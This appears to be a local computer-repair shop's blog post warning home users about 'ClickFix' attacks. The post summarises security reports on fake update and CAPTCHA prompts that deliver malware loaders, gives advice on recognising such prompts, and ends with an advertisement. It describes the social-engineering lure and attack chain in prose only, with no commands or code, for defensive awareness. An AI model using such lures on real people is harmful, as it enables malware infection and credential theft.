Security researchers warned this week that a wave of new 'ClickFix' attacks is infecting Windows PCs at scale by disguising malware as routine browser update prompts and 'verify you are human' boxes. Three independent reports published June 16 detail how the technique is now delivering brand-new malware loaders tied to ransomware crews — and it works because the victim, not a vulnerability, runs the malicious command.
What ClickFix is, in plain English
ClickFix is a social-engineering trick that pops up a convincing fake error, CAPTCHA, or update notice in a web browser and instructs the user to 'fix' the problem by pressing Windows+R, pasting a command, and hitting Enter. That command quietly downloads malware. Researchers describe ClickFix as having graduated from a clever social engineering trick to a mature malware delivery ecosystem, succeeding not because of sophisticated exploits but because it weaponizes one of the oldest vulnerabilities in cybersecurity: humans follow instructions, especially when they appear to come from an authoritative-looking prompt.
This week three security firms — Morphisec, BlueVoyant, and Huntress — published separate reports showing the technique is now being used to deliver three different malware families. Cybersecurity researchers flagged multiple ClickFix campaigns that deliver three malware loaders called BabaDeda Loader, Lorem Ipsum Loader, and Potemkin, per independent reports from Morphisec, BlueVoyant, and Huntress, respectively.
What gets installed if you fall for it
These aren't harmless adware infections. The loaders are stepping stones to information stealers, remote access trojans, and ransomware. The attack begins with ClickFix, a social engineering technique that convinces users to run attacker-supplied commands through trusted operating system utilities, then transitions into a multi-stage loader that chains hidden PowerShell, in-memory shellcode, DLL sideloading, external payload storage, and callback-based execution to deliver information stealers and remote access trojans.
The Lorem Ipsum chain is the most alarming for home users and small businesses. The Lorem Ipsum ecosystem has been attributed with high confidence to a financially motivated threat actor known as Vanilla Tempest (aka Rapid Brigantine, Vice Society, and Vice Spider) that's known for deploying ransomware families like Rhysida, BlackCat, Zeppelin, and Quantum Locker. The Potemkin chain is built to steal saved browser passwords: the loader serves as a conduit for EtherRAT and RMMProject, a Lua-scriptable DLL with modules to enable remote screen control and browser credential theft by getting around Chromium's App-Bound Encryption (ABE) protections. If your machine starts behaving oddly after one of these prompts, you'll want professional malware cleanup before logging into anything sensitive.
Why the lures look so convincing now
Until recently, attackers tricked victims into running signed installers that looked like legitimate Microsoft Teams downloads. That changed in late May. Researchers at BlueVoyant, who have tracked the Lorem Ipsum campaign since February 2026, observed the shift in late May, just days after Microsoft dismantled the Fox Tempest infrastructure and revoked more than 1,000 fraudulently obtained Microsoft Trusted Signing certificates; the loss of certificate supply rendered the previous signed-installer delivery model unviable, forcing the operators to adopt a delivery mechanism that eliminates code signing entirely.
The attackers pivoted to hacked websites. The ClickFix technique has been observed in an active campaign that uses at least five compromised WordPress sites as a starting point to deliver the Lorem Ipsum Loader, with the hacked websites spanning multiple sectors including architecture, legal services, and construction technology. The fake prompt itself is usually styled as a Microsoft Edge security update. Attack sequences distributing Lorem Ipsum Loader make use of ClickFix-style Edge web browser security update lures to run a malicious command that downloads a ZIP file and an outdated version of Node.js released in 2017 (version 7.10.1) to execute JavaScript-based payloads. Translation: an everyday legitimate-looking small-business website can serve you a fake update box, and once you paste that command, your PC is doing the attacker's work for it.
How to recognize and avoid ClickFix prompts
There is one rule that defeats every version of this attack: legitimate websites will never ask you to open the Run box, paste a command, or press Windows+R to fix anything. Not to prove you're human, not to update your browser, not to view a document, not ever.
Real browser updates happen inside the browser's own settings menu, not through a webpage popup. Real Windows updates come through Settings → Windows Update, not from a site you happened to visit. If you see a prompt walking you through keyboard shortcuts and copy-paste steps, close the tab. If you already ran the command, disconnect the PC from the internet and bring it in — these infections often persist after a restart and can spread to mapped drives, making professional cleanup and file recovery the safer route than trying to remove them yourself.
What This Means for York, PA
York-area home users and small businesses are exactly the audience these campaigns are built to hit — the fake prompts now live on hacked legal, architecture, and small-business WordPress sites that a York County visitor could reach from a normal Google search. If you've seen one of these 'paste this to continue' boxes on any PC at home or at the office, power it down and bring it to York Computer Repair at 2069 Carlisle Rd — we can confirm whether anything ran and clean it before passwords or files get stolen.